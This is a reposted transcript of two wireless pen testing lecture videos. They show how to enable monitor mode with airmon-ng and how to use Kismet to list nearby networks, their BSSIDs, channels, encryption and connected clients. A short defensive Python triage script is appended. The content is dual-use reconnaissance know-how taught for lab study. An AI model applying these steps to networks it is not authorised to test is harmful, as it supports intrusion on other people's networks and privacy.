    Hey, Leo Dregier here. I want to check out some aircrack-ng tools and the way that they are set up. One of the things that I want to do is set up airmon-ng to basically put an interface in monitor mode. So what we need to do here is run airmon-ng -h, and that will tell us what is going on. So it is airmon-ng start, stop or check; in this case it was to do a quick check: airmon-ng check and then your interface, which is wlan0, is what I have it set up as in this case. That worked out just fine. So now I am going to change it from check to start, and it creates these additional interfaces here: wlan0 and then your monitor interface, so this gets set up. Now once you have that set up, you can go over to the iwconfig utility and just type iwconfig and hit Enter. Go to your monitor interface and see that this is set to monitor mode, and that is going to allow you to start doing things like packet injection and things like that. Also you can use iwconfig for troubleshooting, as you may need to come back to that at a later time. Nonetheless, it tells you the frequency that you are on and some basic information. One of the things that I find most helpful with any sort of tool like this is actually just doing some basic research on the internet. When we start getting into the wireless pen testing world, it is its own beast, just like web application pen testing is its own beast. So don't be afraid to use the internet as your resource here. So specifically, all I have done here is just check iwconfig to see that my monitor mode, the mon0 interface, is actually set to monitor here, and that is a key piece of information. So right from the top: airmon-ng -h, check it, start the interface, see that it is turned on, and then do an iwconfig and just review that it is set to monitor mode, and that is about it. It is relatively easy to set up, but now once you run through this lab, this is a great precursor activity that you want to do realistically before you start any sort of wireless pen testing. It is a quick sanity check, so relatively easy to see if you are set up. Let us start doing some of the advanced labs, and I would go ahead and do it. So thanks for watching, and I will see you in the next video.

 

5. Using Kismet

    The last lab of the Wireless module series focuses on Kismet scanning.

    Kismet is a wireless scanner that works like a police scanner for wireless networks. In the Kismet lab, you'll learn proper setup and other basic wireless network sniffing tasks.

    You'll see a demonstration of how it works in real time and learn what criteria and options are available to select for the type of monitoring analysis you want to perform in your penetration-testing routine.

    Hi Leo Dregier here. I want to talk about some of the wireless pen testing tools and one of the first tools that you are going to want to run is basically a packet sniffer. A wireless scanner called kismet, kismet is a great little scanner I would like to think of it as a kind of police scanner for wireless networks. So what we are going to do is walk through this setup basically just do some basic wireless sniffing. First thing we are going to do in our Kali operating system is we are going to go over to Kali – go over to wireless tools and then start kismet from the menu. You can of course just type kismet from the bash prompt and that would be just fine. So kismet – it says kismet is running its root – kismet was starting as root – this is not recommended and can be dangerous – only because basically it gets a higher priority to the system. If you are just poking and prodding around. It is absolutely fine so you could say do not show the warning again or just go ahead and select okay. So automatically start the kismet server – launch kismet server and connect to it automatically. If you use a kismet server started elsewhere choose no. In this case I don’t have another instance of it running – so I am going to go ahead and select yes. Startup options if I want anything – set login to on – the log title is kismet show the console and then go ahead and click start and you should start seeing some basic information and / or error messages pop to the screen. They can see one of the error messages that I am getting towards the bottom here. Couldn’t I connect to the GPS server or reconnect in five seconds and then ten seconds and fifteen seconds and it will continue to doing this. But it did accept the connection from 127.0.0.1 kismet started with no packets or system find. No sources were to find or all defined sources has encountered unrecoverable errors. Kismet will not be able to capture any data until it capture interfaces at it. 
Would you like to do this – this is a relatively easy message to get around because we just simply have to add our interfaces. So go ahead and select yes. In this case the interface is going to be WLAN0 the name of it wireless LAN0 and any sort of options you could add. Otherwise just go ahead and select them and it says kismet. You can read these messages here – they go by relatively quickly but I am already starting to see traffic because of all these detected, detected, detected plus I am seeing the mac addresses of the interfaces plus the actual SSID names of the interfaces. That is there coming in – the one that we are going to be working with Cybrary which you can see right there towards the top. So close the console window that is going to be fine and then you can see if I make this a little bit bigger that basically I have my console. Basically detecting information now just this in itself is huge because tells me a lot of things. One I have my wireless card connected – wireless card that I am using right now which you can see in the BM setup is the etherous UB91C interface wireless card which is a great card to use. You can basically setup up a wireless pen testing kit for right around a hundred dollars and that would probably get you a decent card. Maybe a GPS receiver and if you are lucky maybe a blue tooth sniffer or blue tooth antennae. So we are going to go here and you can see the Cybrary interface here if I scroll down. It is going to bounce around a little bit but if I just read Cybrary – it is you can see that it is on channel one. It is receiving packets – I have some size and some traffic on it and there is a couple of things running on channel one. Others are running on channel six and eleven. So those are definitely the high traffic channels at the moment and then basically it is just going through this and you can click on this menu up here. There is your server console – I can do a d for disconnect or c to connect. 
    I can add a source, I can configure a channel, configure plugins, and you can basically just kind of go through this if you wanted to. So if I wanted to add a plugin I could select the plugin. You scroll down with your up and down arrows and hit enter here. So preferences – if I wanted to set up some preferences I could set up colors or GPS or columns or servers or audio, or start and stop the server. Also I can sort; right now it is set to auto sort, but I can sort by type, channel, what is encrypted versus not. So if I just do "e", this will basically set it up to sort by encryption, and that will stop it from bouncing around a little bit. So the sort is a good idea; otherwise, if you just click on the sort menu here at the top, you will be able to see the networks in play here – so like "s" for sort or "k" for Kismet or "v" for view and "w" for windows. So I like to do a Ctrl+Alt, and that will give me that menu, and "s" for sort, or hit enter, etc., etc. So you can scroll through that – you can do first seen, last seen, sort by the SSID or BSSID, and then you can just basically either type the letter here that you want, and that will automatically do it for you if you are into keyboard shortcuts, or you can actually just scroll through and select it if you want. So now I have got it set to SSID. Another cool part about what Kismet does is that it actually shows you which people have their SSID set to do not broadcast, and I like that, because what are they trying to hide at that point? But we are going to scroll here and look at Cybrary, which is the access point that I currently have set up. You can see the BSSID 00:1F:90:28:61:4… and it is basically set up to encrypt the traffic. So I can go ahead and hit enter there, and I can kind of scroll through here and get a basic overview of how that access point is set up.
    So I have your SSID, Cybrary, your BSSID again 00:1F (we will just call it 00:1F for short), and it is definitely very helpful to go ahead and write that down, because whenever you are doing any sort of attack you are going to need to reference these BSSIDs, especially if you start getting into spoofing access points and things like that. The manufacturer is "Actionte", which is Actiontec, which is basically the default Verizon access point that we have had for some time now. I just started it, so the "first seen" is accurate. It is an access point set up as managed infrastructure. It is running on channel one; it shows me the frequencies that it is running on, what packets it has seen per frequency and what percentage of the traffic. So it is running on frequencies 24, 12 and 17 the most, because that is where about 70% of the traffic is actually coming in on. The SSID is Cybrary – so not only does it say the name at the top but also the SSID at the bottom. The beacon – beacons are a type of traffic; this is basically an advertisement from one access point to another access point. The 802.11d country: I am set to the United States. The encryption level is set – 10% of the traffic has been weakened. Also I have my signal, noise, and what encryption it thinks it is set as. So it is picking it up as set up as WEP, which is correct, and the interface it is seen on, wireless LAN zero, and so that will give you a basic overview of basically how this is set up. So I accidentally shut down the server, so let me start it back up again, and you notice it is okay to do that. Sometimes you go in and out of this little scanner time after time after time – hang on a second, it should pop up, or you can actually tell it to start the server. So Kismet starts the server – started, give it a second to run – okay, now that the server is back up and running, we can go ahead and basically look at the different types of traffic here.
    So you can sort for specific networks if you want to; if you do an Alt+N, that will bring up the network menu. We are not going to need that right now, so we are going to close out of that. Also you could do an Alt+V and that will show you the view menu as well. So if you want to mess with that you certainly could. Now that Kismet is up and running and I have it sorted to Cybrary, you get all of the basic details that you need here right in this menu, and you get to specifically see some of the traffic and the pattern, and I have got it sorted to Cybrary. Otherwise, some of the other things that you guys can do in here is you can go through the sort menus, the view menus – if you want to look at the GPS data, battery information, status, these are all different things that you can add – specifically like the client list and things like that per interface. So you can see that I have got a couple of clients connected to the Cybrary interface as well, and that is helpful because that tells you one thing corresponding to the number of packets that the access point is actually seeing. You would expect a large number of clients to produce a lot more traffic, so that would make sense as well. Otherwise you kind of poke around; it is all based on keyboard shortcuts, and like I said, it is used as a police scanner of sorts. If you just want to read these information messages right here, you can kind of see what is happening between the clients and server and things like that. If you do decide to use this with a particular GPS client, that will be really, really helpful for plotting the networks out. I currently don't have the GPS set up at this time, but I could easily do that as well; I would just have to plug it in and then have Kismet basically read the GPS data as well. Then you can go out and start war driving or war walking or war chalking, which is your symbols, and you can go ahead and do all the classic stuff right here.
    Otherwise it is basically just poking and prodding around and getting an idea of how this works. The Kismet menu is really, really simple: plugins, preferences, disconnect and connect, start the server, stop the server, sort by type, channel, whether it is encrypted or not, basic service set identifier, the number of packets, and what you actually want to see, like the client list. Sometimes it is easier to take off that client list just because it cleans up your interface a little bit. So like I said, it is a basic program to use – I love it as a basic sniffer, a quick sanity check for who is out there, and then you can have some fun with it. Then you start getting into some of the advanced details: you want to start seeing the client list for that particular interface, you can start pulling the MAC addresses of the clients connected to it, and then finally you just shut down the server; Ctrl+C will shut it down. It will say "Kismet client is…" – so that is the basic setup of a little wireless scanner like Kismet. There are other ones that are certainly more popular, but this gives you all the critical information that you need, so that if you want to start doing airmon-ng or something like this, you get the basic service set identifier and things like that, because the next step would be to take the things that you learn from Kismet and then start learning how to do some of the aircrack-ng suite. So for example airmon-ng is certainly going to be one of the next things that you are going to do. So I just did an airmon-ng -h and you can see that airmon-ng takes start, stop, check, the interface and then the channel. So just to give you an idea: airmon-ng start (start sniffing the traffic), then your interface, wlan0, and we were set to channel one. Channel or frequency – now some of the mandatory stuff is going to be in the greater-than and less-than brackets. So start, stop, check – that is mandatory – and then the interface is mandatory, and then the channel or frequency is optional, but if you know it,
    you add it in. Okay. So here airmon-ng found processes that could cause trouble: "if airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill some of them." So in this case the network manager, the WPA client and the DHCP client are all potentially interfering with this, which is similar to doing an airmon-ng check. So in some of the older conventions you could do a "check kill", and that is actually very, very helpful, because anything that has the potential for interfering with this, it will actually kill the processes that are interfering. So you can do that right from within this, as opposed to doing something like a kill or pkill or something like that where you actually have to type all of this stuff in. Basically, if you put kill at the end of your statement, that will certainly speed things up, and then we will just go and turn it on again. And now we get something completely different: airmon started for the wireless interface on channel one. So we have got the wlan0 monitor interface with my arrows, and monitor mode enabled on mon0, and then we also get our monitor channel. So basically we are set to monitor mode at this point. I have just done very, very basic stuff here. I set up Kismet as a scanner, I looked around, I have got some basic information that I need, and then I can go ahead and spin that off and run that into some other labs like airmon-ng and things like that, and we will cover those in subsequent videos. I just wanted to get the basics for the Kismet setup first so that I can start sniffing out basic service set identifiers, and it will be helpful to have a pen and paper handy so that you can jot down SSIDs and clients and MAC addresses and extended service set identifiers and things like that. So that is an overview of Kismet. Thanks for watching, my name is Leo Dregier and I will see you in the next video.
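The triage the lecture does by hand in the Kismet window (sort by encryption, read the channel load, note hidden SSIDs and WEP networks) can be scripted once a survey has been captured. The script below is an added example for this section, not Kismet's own code or log format; the record layout, BSSIDs and counts are constructed for illustration.

```python
"""Wireless survey triage (added example; the record format is constructed,
not Kismet's netxml/CSV output). Applies the sorting and flagging a defender
does by eye in Kismet: weakest encryption first, packets per channel, and a
findings list of hidden SSIDs, WEP networks and open networks with clients."""
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Network:
    ssid: str          # empty string: the AP does not broadcast its SSID
    bssid: str
    channel: int
    encryption: str    # "Open", "WEP", "WPA" or "WPA2" as the scanner sees it
    packets: int
    clients: int


# Constructed sample survey; BSSIDs are placeholders, not real hardware.
SAMPLE_SURVEY = [
    Network("Cybrary",    "00:1F:90:00:00:01", 1,  "WEP",  4200, 2),
    Network("",           "00:1F:90:00:00:02", 6,  "WPA2", 310,  1),
    Network("GuestNet",   "00:1F:90:00:00:03", 6,  "Open", 980,  5),
    Network("HomeOffice", "00:1F:90:00:00:04", 11, "WPA2", 120,  0),
    Network("OldPrinter", "00:1F:90:00:00:05", 11, "WEP",  15,   0),
]

# Weakest protection ranks lowest so it sorts to the top of the list.
ENCRYPTION_RANK = {"Open": 0, "WEP": 1, "WPA": 2, "WPA2": 3}


def sort_by_encryption(nets):
    """Same idea as pressing 'e' in Kismet's sort menu: weakest encryption
    first, ties broken so busier networks come before idle ones."""
    return sorted(nets, key=lambda n: (ENCRYPTION_RANK.get(n.encryption, 99), -n.packets))


def channel_load(nets):
    """Packets seen per channel, to confirm which channels carry the traffic."""
    load = Counter()
    for n in nets:
        load[n.channel] += n.packets
    return dict(load)


def findings(nets):
    """(bssid, reason) pairs worth a defender's follow-up."""
    out = []
    for n in nets:
        if n.ssid == "":
            out.append((n.bssid, "SSID not broadcast"))
        if n.encryption == "WEP":
            out.append((n.bssid, "WEP in use"))
        if n.encryption == "Open" and n.clients > 0:
            out.append((n.bssid, f"open network with {n.clients} clients"))
    return out
```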
posted @ 2015-09-30 22:19  It's_Lee